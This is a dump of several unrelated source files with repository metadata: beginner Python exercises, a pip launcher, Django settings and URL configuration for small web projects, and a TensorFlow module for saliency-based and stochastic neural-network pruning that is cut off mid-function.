4c6cba9f06a7e402e11b60ad4652c68f180ec164 | 8c91c598474c266f8a0f3cfedc65a9a572e0cd56 | /Jump_to_python/Chap03/135.py | 7489aa83883ed7b4ca30ba9a5dd78a8704d57697 | [] | no_license | dlpqlb0429/jumptopy | d62b07d141bd2af57b004bdd33382085c8d0d714 | 1c3236a002d55bf2d7a19657b722bc483f890f2e | refs/heads/master | 2021-09-01T12:36:22.366509 | 2017-12-27T01:47:28 | 2017-12-27T01:47:28 | 112,164,324 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 120 | py | for i in range(2,10):
for j in range(1,10):
#print(i*j,end="*")
print(i * j, end="*")
print('*') | [
"dlpqlb@nate.com"
] | dlpqlb@nate.com |
a95fc2d66aa81492e74d579bc3484807408625ce | 953ba7efe0fd58fc069c148dd17a820fb2fa1d3e | /venomsite/bin/pip3 | a5755ff9687c5ea9199dcab334a7d8a0d117ce76 | [] | no_license | wcrober/Venombaseball | 383f5b4b18b5904c771e024a3b35d46eeae4c983 | 18b765384f77704444fd645679d21c9f80034f81 | refs/heads/master | 2020-06-26T03:46:55.358090 | 2019-08-04T22:11:15 | 2019-08-04T22:11:15 | 199,517,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 275 | #!/Users/willroberts/Projects/apps/python/VenomBaseball/venomsite/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"wcrober@gmail.com"
] | wcrober@gmail.com | |
c97d3c61fbb6ae6b32df8c5fe29f82553b89c061 | ae8f3e379a4346eed2bb2fe7fdbe699bb7c47cdc | /TodoProject/TodoProject/settings.py | bfde4d9277b602fcc82c5ac6d4c2250c9aea2def | [] | no_license | snehal2196/Todo-Application | b9d1182b52488b9d07e72200bfa9d540903521cf | 686f88defe3178a28025e6aef7ff4cc80a1e8dc4 | refs/heads/master | 2023-08-02T05:05:21.611015 | 2021-09-26T11:48:46 | 2021-09-26T11:48:46 | 410,532,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,477 | py | """
Django settings for TodoProject project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): dev key committed to source -- load from an environment
# variable (e.g. os.environ) before deploying.
SECRET_KEY = 'django-insecure-&ft9w3m_+79mj0)775m!m^bsr(jn73d!zgb-#!@49ys9@em#1w'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list is fine while DEBUG is True; must list real hosts in production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'TodoApp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'TodoProject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates']
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'TodoProject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'TodoDB',
'USER': 'postgres',
'PASSWORD': 'postgres',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"snehalshelar375@gmail.com"
] | snehalshelar375@gmail.com |
0eff00e332304fab72d0531f3669040157296380 | 839d0f5a000bd6701eec79db73edbc9b07f50841 | /PycharmProjects/practice/demoInput.py | 959e98778de980904cbc297d8ef90c5a39b6d2a2 | [] | no_license | eelster/NRPSQuanification | 966a3014e95228b7dff10089c8e807a4574c57a3 | 4fffe39684f397ecd45c72662430393e333b00b4 | refs/heads/master | 2021-01-21T16:39:19.048299 | 2016-07-22T19:55:55 | 2016-07-22T19:55:55 | 64,565,951 | 4 | 0 | null | 2016-07-30T22:06:57 | 2016-07-30T22:06:55 | null | UTF-8 | Python | false | false | 60 | py | person = input('Enter your name: ')
print('Hello', person)
| [
"n.j.davis.college@gmail.com"
] | n.j.davis.college@gmail.com |
544f47b833d6bbc5da3661a0a4c14454cc6224f9 | ec5d820a7e93f66cfa7952f42efe2ab86b87537f | /turbo/urls.py | f092f7eac8ef7bc90d2a89ebf579028efed08286 | [] | no_license | suxingwang837/turbo | 7a86ef033ecbb56a55dd2dba4045b16b082b38af | 2bdb547aff5c88417d0fb10c39d70b823358c0b4 | refs/heads/master | 2023-09-02T22:53:45.469328 | 2021-11-17T02:39:12 | 2021-11-17T02:39:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,236 | py | """turbo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls.static import static
from django.urls import path, include
from django.conf.urls.i18n import i18n_patterns
from turbo import settings
from turbo.urlpatterns import api_urlpatterns, conf_urlpatterns
# URL prefix: http://127.0.0.1:8000/zh-hans/
# (i18n_patterns prepends the active language code to each URL)
urlpatterns = i18n_patterns(
    path('api/', include(api_urlpatterns)),
)
# URL prefix: http://127.0.0.1:8000/ (no language prefix)
urlpatterns += [
    path('conf/', include(conf_urlpatterns)),
]
# Serve uploaded media and collected static files via Django (development use).
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) \
               + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| [
"zhaojiaxiang1314@foxmail.com"
] | zhaojiaxiang1314@foxmail.com |
d4b8385db5a7de7d7fc90ce283a4730f97a653d5 | a0c45e7a4d8f88ce0704f377b58ea6868c5d98a7 | /src/tf_codes/pruning.py | 0923ad242173b0539423037f1b6f0059904ec85e | [] | no_license | mark-h-meng/stochastic-data-free-pruning | 28338af8fbeb521909ab4270b9b3fbe54dec0d72 | 692813ebd8e630952cc63fef87d2d7dcb4b585b2 | refs/heads/master | 2023-08-11T09:19:27.509503 | 2021-09-07T07:15:13 | 2021-09-07T07:15:13 | 336,969,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,835 | py | import utility.bcolors
import utility.saliency as saliency
import utility.utils as utils
import utility.interval_arithmetic as ia
import utility.simulated_propagation as simprop
import math
import numpy as np
import random
# Saliency-only method
def pruning_baseline(model, big_map, prune_percentage=None,
                     neurons_manipulated=None,
                     saliency_matrix=None,
                     recursive_pruning=False,
                     bias_aware=False):
    """Baseline pairwise pruning driven purely by the saliency measure.

    For every Dense layer except the output layer: build a pairwise saliency
    matrix over the layer's neurons, pick the least-salient pairs, and
    "merge" each pair (node_a, node_b) -- node_a's outgoing weights absorb
    node_b's, and node_b's outgoing weights are zeroed.  This is simulated
    pruning: the neuron stays in the architecture with all-zero fan-out.

    :param model: Keras-style model (layers expose .name / get/set_weights)
    :param big_map: definition map; unused in this baseline, kept so the
        signature parallels the other pruning strategies
    :param prune_percentage: fraction of each layer's neurons to prune per
        call; None prunes a single pair per layer
    :param neurons_manipulated: per-layer lists of neurons already touched
        in earlier epochs (created fresh when None)
    :param saliency_matrix: per-layer cache of saliency matrices; a layer's
        matrix is recomputed only when its entry is None
    :param recursive_pruning: when True, the surviving neuron of a merged
        pair stays eligible for selection in later epochs
    :param bias_aware: include the layer's bias terms when building saliency
    :return: (model, neurons_manipulated, pruned_pairs, saliency_matrix);
        pruned_pairs is a per-layer list of (kept, pruned) index tuples
    """
    # Load the parameters and configuration of the input model
    (w, g) = utils.load_param_and_config(model)
    num_layers = len(model.layers)
    total_pruned_count = 0
    layer_idx = 0
    pruned_pairs = []
    if neurons_manipulated is None:
        neurons_manipulated = []
    if saliency_matrix is None:
        saliency_matrix = []
    while layer_idx < num_layers - 1:
        pruned_pairs.append([])
        # Grow the carried-over per-layer state on first visit to this layer.
        if len(neurons_manipulated) < layer_idx+1:
            neurons_manipulated.append([])
            saliency_matrix.append(None)
        # Exclude non FC layers
        if "dense" in model.layers[layer_idx].name:
            # print("Pruning Operation Looking at Layer", layer_idx)
            num_prev_neurons = len(w[layer_idx][0])
            num_curr_neurons = len(w[layer_idx][0][0])
            num_next_neurons = len(w[layer_idx + 1][0][0])
            # curr_weights_neuron_as_rows records the weights parameters originating from the prev layer
            # (transpose of the stored kernel: one row per current-layer neuron)
            curr_weights_neuron_as_rows = np.zeros((num_curr_neurons, num_prev_neurons))
            for idx_neuron in range(0, num_curr_neurons):
                for idx_prev_neuron in range(0, num_prev_neurons):
                    curr_weights_neuron_as_rows[idx_neuron][idx_prev_neuron] = w[layer_idx][0][idx_prev_neuron][
                        idx_neuron]
            # next_weights_neuron_as_rows records the weights parameters connecting to the next layer
            next_weights_neuron_as_rows = w[layer_idx + 1][0]
            if saliency_matrix[layer_idx] is None:
                print(" >> Building saliency matrix for layer "+str(layer_idx)+"...")
                if bias_aware:
                    # w[layer_idx][1] records the bias per each neuron in the current layer
                    saliency_matrix[layer_idx] = saliency.build_saliency_matrix_with_bias(curr_weights_neuron_as_rows,
                                                                                          next_weights_neuron_as_rows,
                                                                                          w[layer_idx][1])
                else:
                    saliency_matrix[layer_idx] = saliency.build_saliency_matrix(curr_weights_neuron_as_rows,
                                                                                next_weights_neuron_as_rows)
            else:
                print(" >> Skip building saliency matrix: saliency matrix for layer", layer_idx, "exists.")
            import pandas as pd
            df = pd.DataFrame(data=saliency_matrix[layer_idx])
            # find the candidates neuron to be pruned according to the saliency
            if prune_percentage is not None:
                num_candidates_to_gen = math.ceil(prune_percentage * num_curr_neurons)
            else:
                num_candidates_to_gen = 1
            top_candidates = utils.get_pairs_with_least_saliency(df, neurons_manipulated[layer_idx], num_candidates=num_candidates_to_gen)
            # Just return if there is no candidates to prune
            if len(top_candidates) == 0:
                return model, neurons_manipulated, [], saliency_matrix
            # Now let's process the top_candidate first:
            # top_candidate is a list of Series, with key as multi-index, and value as saliency
            # and we are going to transform that list into a dictionary to facilitate further ajustment
            pruning_pairs_curr_layer_baseline = []
            for idx_candidate, pruning_candidate in enumerate(top_candidates):
                # Extract the indexes of pruning nodes as a tuple (corr. score is no longer useful since this step)
                (node_a, node_b) = pruning_candidate.index.values[0]
                '''
                # CHANGE on Commit db9c736, to make it consistent with paper
                # To standarise the pruning operation for the same pair: we always prune the node with smaller index off
                if node_a > node_b:
                    temp = node_a
                    node_a = node_b
                    node_b = temp
                '''
                pruning_pairs_curr_layer_baseline.append((node_a, node_b))
                # Change all weight connecting from node_a to the next layers as the sum of node_a and node_b's ones
                # & Reset all weight connecting from node_b to ZEROs
                # RECALL: next_weights_neuron_as_rows = w[layer_idx+1][0] ([0] for weight and [1] for bias)
                for i in range(0, num_next_neurons):
                    w[layer_idx + 1][0][node_a][i] = w[layer_idx + 1][0][node_b][i] + w[layer_idx + 1][0][node_a][i]
                    w[layer_idx + 1][0][node_b][i] = 0
                total_pruned_count += 1
                # If recursive mode is enabled, the affected neuron (node_a) in the current epoch still
                # get a chance to be considered in the next epoch. The pruned one (node_b) won't be
                # considered any longer because all its parameters have been zeroed out.
                # NOTE(review): list.remove raises ValueError if node_a is absent --
                # presumably get_pairs_with_least_saliency appended it; confirm.
                if recursive_pruning:
                    if neurons_manipulated[layer_idx] is not None:
                        neurons_manipulated[layer_idx].remove(node_a)
            # Save the modified parameters to the model
            model.layers[layer_idx + 1].set_weights(w[layer_idx + 1])
            pruned_pairs[layer_idx].extend(pruning_pairs_curr_layer_baseline)
        layer_idx += 1
    print("Pruning accomplished -", total_pruned_count, "units have been pruned")
    return model, neurons_manipulated, pruned_pairs, saliency_matrix
# Our greedy method without stochastic heuristic
def pruning_greedy(model, big_map, prune_percentage,
                   cumulative_impact_intervals,
                   pooling_multiplier=1,
                   neurons_manipulated=None,
                   hyperparamters=(0.5, 0.5),
                   recursive_pruning=True,
                   bias_aware=False,
                   kaggle_credit=False):
    """Greedy pairwise pruning guided by simulated impact on the output layer.

    Per Dense layer: build the pairwise saliency matrix, pool the
    ``num_candidates * pooling_multiplier`` least-salient pairs, score each
    candidate by propagating its merge as intervals to the output layer
    (score = alpha * sigmoid(L1 norm) + beta * sigmoid(interval entropy),
    with (alpha, beta) from ``hyperparamters`` -- misspelled name kept for
    interface compatibility), then confirm the lowest-scoring pairs and
    merge them exactly as in ``pruning_baseline`` (node_a absorbs node_b's
    outgoing weights; node_b's are zeroed).

    :param model: Keras-style model (layers expose .name / get/set_weights)
    :param big_map: definition hash map used by the interval propagation;
        refreshed after each pruned layer
    :param prune_percentage: fraction of each layer's neurons to prune;
        None prunes a single pair per layer
    :param cumulative_impact_intervals: output-layer impact intervals carried
        over from earlier calls (created when None)
    :param pooling_multiplier: size factor of the candidate pool relative to
        the number of pairs actually confirmed
    :param neurons_manipulated: per-layer lists of neurons already touched
    :param hyperparamters: (alpha, beta) weights for the L1 / entropy scores
    :param recursive_pruning: when True, the surviving neuron of a confirmed
        pair stays eligible in later epochs
    :param bias_aware: include bias terms when building saliency
    :param kaggle_credit: selects the input interval (-5, 5) instead of
        (0, 1) when refreshing the definition map
    :return: (model, neurons_manipulated, pruned_pairs,
        cumulative_impact_intervals, pruning_pairs_dict_overall_scores)
    """
    # Load the parameters and configuration of the input model
    (w, g) = utils.load_param_and_config(model)
    num_layers = len(model.layers)
    total_pruned_count = 0
    layer_idx = 0
    pruned_pairs = []
    pruning_pairs_dict_overall_scores =[]
    if neurons_manipulated is None:
        neurons_manipulated = []
    e_ij_matrix = []
    while layer_idx < num_layers - 1:
        # Impact (as intervals) of this layer's prunings on the NEXT layer only.
        cumul_impact_ints_curr_layer = None
        pruned_pairs.append([])
        if len(neurons_manipulated) < layer_idx+1:
            neurons_manipulated.append([])
        e_ij_matrix.append(None)
        pruning_pairs_dict_overall_scores.append(None)
        # Exclude non FC layers
        if "dense" in model.layers[layer_idx].name:
            # print("Pruning Operation Looking at Layer", layer_idx)
            num_prev_neurons = len(w[layer_idx][0])
            num_curr_neurons = len(w[layer_idx][0][0])
            num_next_neurons = len(w[layer_idx + 1][0][0])
            # curr_weights_neuron_as_rows records the weights parameters originating from the prev layer
            # (transpose of the stored kernel: one row per current-layer neuron)
            curr_weights_neuron_as_rows = np.zeros((num_curr_neurons, num_prev_neurons))
            for idx_neuron in range(0, num_curr_neurons):
                for idx_prev_neuron in range(0, num_prev_neurons):
                    curr_weights_neuron_as_rows[idx_neuron][idx_prev_neuron] = w[layer_idx][0][idx_prev_neuron][
                        idx_neuron]
            # next_weights_neuron_as_rows records the weights parameters connecting to the next layer
            next_weights_neuron_as_rows = w[layer_idx + 1][0]
            print(" >> Building saliency matrix for layer " + str(layer_idx) + "...")
            if bias_aware:
                # w[layer_idx][1] records the bias per each neuron in the current layer
                e_ij_matrix[layer_idx] = saliency.build_saliency_matrix_with_bias(curr_weights_neuron_as_rows,
                                                                                  next_weights_neuron_as_rows,
                                                                                  w[layer_idx][1])
            else:
                e_ij_matrix[layer_idx] = saliency.build_saliency_matrix(curr_weights_neuron_as_rows,
                                                                        next_weights_neuron_as_rows)
            import pandas as pd
            df = pd.DataFrame(data=e_ij_matrix[layer_idx])
            # find the candidates neuron to be pruned according to the saliency
            if prune_percentage is not None:
                num_candidates_to_gen = math.ceil(prune_percentage * num_curr_neurons)
            else:
                num_candidates_to_gen = 1
            # find the candidates neuron to be pruned according to the saliency
            # (pool is oversized by pooling_multiplier; only the best-scoring
            # num_candidates_to_gen pairs are confirmed below)
            top_candidates = utils.get_pairs_with_least_saliency(df, neurons_manipulated[layer_idx],
                                                                 num_candidates=num_candidates_to_gen* pooling_multiplier)
            # Just return if there is no candidates to prune
            if len(top_candidates) == 0:
                return model, neurons_manipulated, [], cumulative_impact_intervals, pruning_pairs_dict_overall_scores
            # Now let's process the top_candidate first:
            # top_candidate is a list of Series, with key as multi-index, and value as saliency
            # and we are going to transform that list into a dictionary to facilitate further ajustment
            pruning_pairs_curr_layer_confirmed = []
            pruning_pairs_dict_curr_layer_l1_score = {}
            pruning_pairs_dict_curr_layer_entropy_score = {}
            pruning_pairs_dict_overall_scores[layer_idx] ={}
            for idx_candidate, pruning_candidate in enumerate(top_candidates):
                # Extract the indexes of pruning nodes as a tuple (corr. score is no longer useful since this step)
                (node_a, node_b) = pruning_candidate.index.values[0]
                # print(" >> Looking into", (node_a, node_b))
                '''
                # CHANGE on Commit db9c736, to make it consistent with paper
                # To standarise the pruning operation for the same pair: we always prune the node with smaller index off
                if node_a > node_b:
                    temp = node_a
                    node_a = node_b
                    node_b = temp
                '''
                # Below is the hill climbing algorithm to update the top_candidate by dividing the original saliency by
                # the l1-norm of the budget preservation list (the higher the better)
                pruning_impact_as_interval_next_layer = simprop.calculate_impact_of_pruning_next_layer(model, big_map,
                                                                                                       [(node_a, node_b)], layer_idx,
                                                                                                       kaggle_credit=kaggle_credit)
                # Check is cumulative_impact_interval is none or not, not none means there is already some cumulative impact
                # caused by previous pruning actions
                if cumul_impact_ints_curr_layer is not None:
                    pruning_impact_as_interval_next_layer = ia.interval_list_add(pruning_impact_as_interval_next_layer,
                                                                                 cumul_impact_ints_curr_layer)
                pruning_impact_as_interval_output_layer = simprop.calculate_bounds_of_output(model,
                                                                                             pruning_impact_as_interval_next_layer,
                                                                                             layer_idx + 1)
                big_L = utils.l1_norm_of_intervals(pruning_impact_as_interval_output_layer)
                # Use sigmoid logistic to normalize
                big_L = 1 / (1 + math.exp(-1 * big_L))
                big_ENT = utils.interval_based_entropy(pruning_impact_as_interval_output_layer, similarity_criteria=0.9)
                # Use sigmoid logistic to normalize
                big_ENT = 1 / (1 + math.exp(-1 * big_ENT))
                # Now we are going re-sort the saliency according to the utilization situation of each pair pruning
                pruning_pairs_dict_curr_layer_l1_score[(node_a, node_b)] = big_L
                # Avoid entropy equals to zero
                pruning_pairs_dict_curr_layer_entropy_score[(node_a, node_b)] = big_ENT
                (alpha, beta) = hyperparamters
                print((node_a, node_b), "Ent:", big_ENT)
                # pruning_pairs_dict_overall_scores[(node_a, node_b)] = pruning_candidate.values[0] * (big_L * alpha + big_ENT * beta)
                pruning_pairs_dict_overall_scores[layer_idx][(node_a, node_b)] = big_L * alpha + big_ENT * beta
            count = 0
            # Sort candidates by combined score (ascending) and confirm the
            # first num_candidates_to_gen pairs (smallest estimated impact).
            pruning_pairs_dict_overall_scores[layer_idx] = dict(sorted(pruning_pairs_dict_overall_scores[layer_idx].items(), key=lambda item: item[1]))
            for pair in pruning_pairs_dict_overall_scores[layer_idx]:
                if count < num_candidates_to_gen:
                    pruning_pairs_curr_layer_confirmed.append(pair)
                    # If recursive mode is enabled, the affected neuron (node_a) in the current epoch still
                    # get a chance to be considered in the next epoch. The pruned one (node_b) won't be
                    # considered any longer because all its parameters have been zeroed out.
                    if recursive_pruning:
                        (neuron_a, neuron_b) = pair
                        neurons_manipulated[layer_idx].remove(neuron_a)
                    else:
                        # Drop that pair from the neurons_manipulated list and enable re-considering in future epoch
                        (neuron_a, neuron_b) = pair
                        neurons_manipulated[layer_idx].remove(neuron_a)
                        neurons_manipulated[layer_idx].remove(neuron_b)
                count += 1
            # Here we evaluate the impact to the output layer
            if cumul_impact_ints_curr_layer is None:
                cumul_impact_ints_curr_layer = simprop.calculate_impact_of_pruning_next_layer(model, big_map, pruning_pairs_curr_layer_confirmed, layer_idx)
            else:
                cumul_impact_ints_curr_layer = ia.interval_list_add(cumul_impact_ints_curr_layer,
                                                                    simprop.calculate_impact_of_pruning_next_layer(model, big_map,
                                                                                                                   pruning_pairs_curr_layer_confirmed,
                                                                                                                   layer_idx,
                                                                                                                   kaggle_credit=kaggle_credit))
            if cumulative_impact_intervals is None:
                cumulative_impact_intervals = simprop.calculate_bounds_of_output(model, cumul_impact_ints_curr_layer, layer_idx+1)
            else:
                cumulative_impact_intervals= ia.interval_list_add(cumulative_impact_intervals,
                                                                  simprop.calculate_bounds_of_output(model,
                                                                                                     cumul_impact_ints_curr_layer,
                                                                                                     layer_idx+1))
            print(" >> DEBUG: len(cumulative_impact_curr_layer_pruning_to_next_layer):", len(cumul_impact_ints_curr_layer))
            print(" >> DEBUG: len(cumulative_impact_to_output_layer):", len(cumulative_impact_intervals))
            # Now let's do pruning (simulated, by zeroing out weights but keeping neurons in the network)
            for (node_a, node_b) in pruning_pairs_curr_layer_confirmed:
                # Change all weight connecting from node_a to the next layers as the sum of node_a and node_b's ones
                # & Reset all weight connecting from node_b to ZEROs
                # (comment fixed: node_a is the survivor, node_b is pruned)
                # RECALL: next_weights_neuron_as_rows = w[layer_idx+1][0] ([0] for weight and [1] for bias)
                for i in range(0, num_next_neurons):
                    w[layer_idx + 1][0][node_a][i] = w[layer_idx + 1][0][node_b][i] + w[layer_idx + 1][0][node_a][i]
                    w[layer_idx + 1][0][node_b][i] = 0
                total_pruned_count += 1
            # Save the modified parameters to the model
            model.layers[layer_idx + 1].set_weights(w[layer_idx + 1])
            pruned_pairs[layer_idx].extend(pruning_pairs_curr_layer_confirmed)
            # TEMP IMPLEMENTATION STARTS HERE
            # Refresh the definition map after this layer's weights changed;
            # the input interval depends on the dataset normalization.
            if not kaggle_credit:
                big_map = simprop.get_definition_map(model, definition_dict=big_map, input_interval=(0, 1))
            else:
                big_map = simprop.get_definition_map(model, definition_dict=big_map, input_interval=(-5, 5))
            print("Pruning layer #", layer_idx, "completed, updating definition hash map...")
            # TEMP IMPLEMENTATION ENDS HERE
        layer_idx += 1
    print(" >> DEBUG: size of cumulative impact total", len(cumulative_impact_intervals))
    print("Pruning accomplished -", total_pruned_count, "units have been pruned")
    return model, neurons_manipulated, pruned_pairs, cumulative_impact_intervals, pruning_pairs_dict_overall_scores
def pruning_stochastic(model, big_map, prune_percentage,
cumulative_impact_intervals,
neurons_manipulated=None,
target_scores=None,
hyperparamters=(0.5, 0.5),
recursive_pruning=True,
bias_aware=False,
kaggle_credit=False):
# Load the parameters and configuration of the input model
(w, g) = utils.load_param_and_config(model)
num_layers = len(model.layers)
total_pruned_count = 0
layer_idx = 0
pruned_pairs = []
pruning_pairs_dict_overall_scores =[]
if neurons_manipulated is None:
neurons_manipulated = []
if target_scores is None:
target_scores = []
e_ij_matrix = []
while layer_idx < num_layers - 1:
cumul_impact_ints_curr_layer = None
pruned_pairs.append([])
if len(neurons_manipulated) < layer_idx + 1:
neurons_manipulated.append([])
if len(target_scores) < layer_idx + 1:
target_scores.append(-1)
e_ij_matrix.append(None)
pruning_pairs_dict_overall_scores.append(None)
# Exclude non FC layers
if "dense" in model.layers[layer_idx].name:
# print("Pruning Operation Looking at Layer", layer_idx)
num_prev_neurons = len(w[layer_idx][0])
num_curr_neurons = len(w[layer_idx][0][0])
num_next_neurons = len(w[layer_idx + 1][0][0])
# curr_weights_neuron_as_rows records the weights parameters originating from the prev layer
curr_weights_neuron_as_rows = np.zeros((num_curr_neurons, num_prev_neurons))
for idx_neuron in range(0, num_curr_neurons):
for idx_prev_neuron in range(0, num_prev_neurons):
curr_weights_neuron_as_rows[idx_neuron][idx_prev_neuron] = w[layer_idx][0][idx_prev_neuron][
idx_neuron]
# next_weights_neuron_as_rows records the weights parameters connecting to the next layer
next_weights_neuron_as_rows = w[layer_idx + 1][0]
print(" >> Building saliency matrix for layer " + str(layer_idx) + "...")
if bias_aware:
# w[layer_idx][1] records the bias per each neuron in the current layer
e_ij_matrix[layer_idx] = saliency.build_saliency_matrix_with_bias(curr_weights_neuron_as_rows,
next_weights_neuron_as_rows,
w[layer_idx][1])
else:
e_ij_matrix[layer_idx] = saliency.build_saliency_matrix(curr_weights_neuron_as_rows,
next_weights_neuron_as_rows)
import pandas as pd
df = pd.DataFrame(data=e_ij_matrix[layer_idx])
# find the candidates neuron to be pruned according to the saliency
if prune_percentage is not None:
num_candidates_to_gen = math.ceil(prune_percentage * num_curr_neurons)
else:
num_candidates_to_gen = 1
# find the candidates neuron to be pruned according to the saliency
top_candidates = utils.get_all_pairs_by_saliency(df, neurons_manipulated[layer_idx])
# Just return if there is no candidates to prune
if len(top_candidates) == 0:
return model, neurons_manipulated, [], cumulative_impact_intervals, pruning_pairs_dict_overall_scores
# Now let's process the top_candidate first:
# top_candidate is a list of Series, with key as multi-index, and value as saliency
# and we are going to transform that list into a dictionary to facilitate further ajustment
pruning_pairs_curr_layer_confirmed = []
count = 0
pruning_pairs_dict_overall_scores[layer_idx] ={}
# A workaround if pruned candidates is less than num_candidate_to_prune after a walking
# then we need to re-walk again until the number of units to be pruned reaches target
while (count < num_candidates_to_gen):
for idx_candidate, pruning_candidate in enumerate(top_candidates):
# Extract the indexes of pruning nodes as a tuple (corr. score is no longer useful since this step)
(node_a, node_b) = pruning_candidate.index.values[0]
# print(" >> Looking into", (node_a, node_b))
'''
# CHANGE on Commit db9c736, to make it consistent with paper
# To standarise the pruning operation for the same pair: we always prune the node with smaller index off
if node_a > node_b:
temp = node_a
node_a = node_b
node_b = temp
'''
if count < num_candidates_to_gen:
# Below is the hill climbing algorithm to update the top_candidate by dividing the original saliency by
# the l1-norm of the budget preservation list (the higher the better)
pruning_impact_as_interval_next_layer = simprop.calculate_impact_of_pruning_next_layer(model, big_map,
[(node_a, node_b)], layer_idx,
kaggle_credit=kaggle_credit)
# Check is cumulative_impact_interval is none or not, not none means there is already some cumulative impact
# caused by previous pruning actions
if cumul_impact_ints_curr_layer is not None:
pruning_impact_as_interval_next_layer = ia.interval_list_add(pruning_impact_as_interval_next_layer,
cumul_impact_ints_curr_layer)
pruning_impact_as_interval_output_layer = simprop.calculate_bounds_of_output(model,
pruning_impact_as_interval_next_layer,
layer_idx + 1)
big_L = utils.l1_norm_of_intervals(pruning_impact_as_interval_output_layer)
# Use sigmoid logistic to normalize
big_L = 1 / (1 + math.exp(-1 * big_L))
big_ENT = utils.interval_based_entropy(pruning_impact_as_interval_output_layer, similarity_criteria=0.9)
# Use sigmoid logistic to normalize
big_ENT = 1 / (1 + math.exp(-1 * big_ENT))
# Now we are going re-sort the saliency according to the utilization situation of each pair pruning
(alpha, beta) = hyperparamters
# print((node_a, node_b), "Ent:", big_ENT)
curr_score = big_L * alpha + big_ENT * beta
# Accept the first sample by-default, or a sample with better (smaller) score
if target_scores[layer_idx] == -1 or curr_score <= target_scores[layer_idx]:
target_scores[layer_idx] = curr_score
pruning_pairs_curr_layer_confirmed.append((node_a, node_b))
# If recursive mode is enabled, the affected neuron (node_a) in the current epoch still
# get a chance to be considered in the next epoch. The pruned one (node_b) won't be
# considered any longer because all its parameters have been zeroed out.
if recursive_pruning:
if node_a in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_a)
count += 1
pruning_pairs_dict_overall_scores[layer_idx][(node_a, node_b)] = target_scores[layer_idx]
print(" [DEBUG]", utility.bcolors.OKGREEN, "Accepting", utility.bcolors.ENDC, (node_a, node_b), curr_score)
# Then we use simulated annealing algorithm to determine if we accept the next pair in the pruning list
else:
# Progress is a variable that grows from 0 to 1
progress = len(neurons_manipulated[layer_idx])/num_curr_neurons
# Define a temperature decending linearly with progress goes on (add 0.0001 to avoid divide-by-zero issue)
temperature = 1.0001 - progress
# Calculate the delta of score (should be a positive value because objective is minimum)
delta_score = curr_score - target_scores[layer_idx]
prob_sim_annealing = math.exp(-1 * delta_score / temperature)
prob_random = random.random()
# Higher probability of simulated annealing, easilier to accept a bad choice
if prob_random < prob_sim_annealing:
target_scores[layer_idx] = curr_score
pruning_pairs_curr_layer_confirmed.append((node_a, node_b))
# If recursive mode is enabled, the affected neuron (node_a) in the current epoch still
# get a chance to be considered in the next epoch. The pruned one (node_b) won't be
# considered any longer because all its parameters have been zeroed out.
if recursive_pruning:
if node_a in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_a)
count += 1
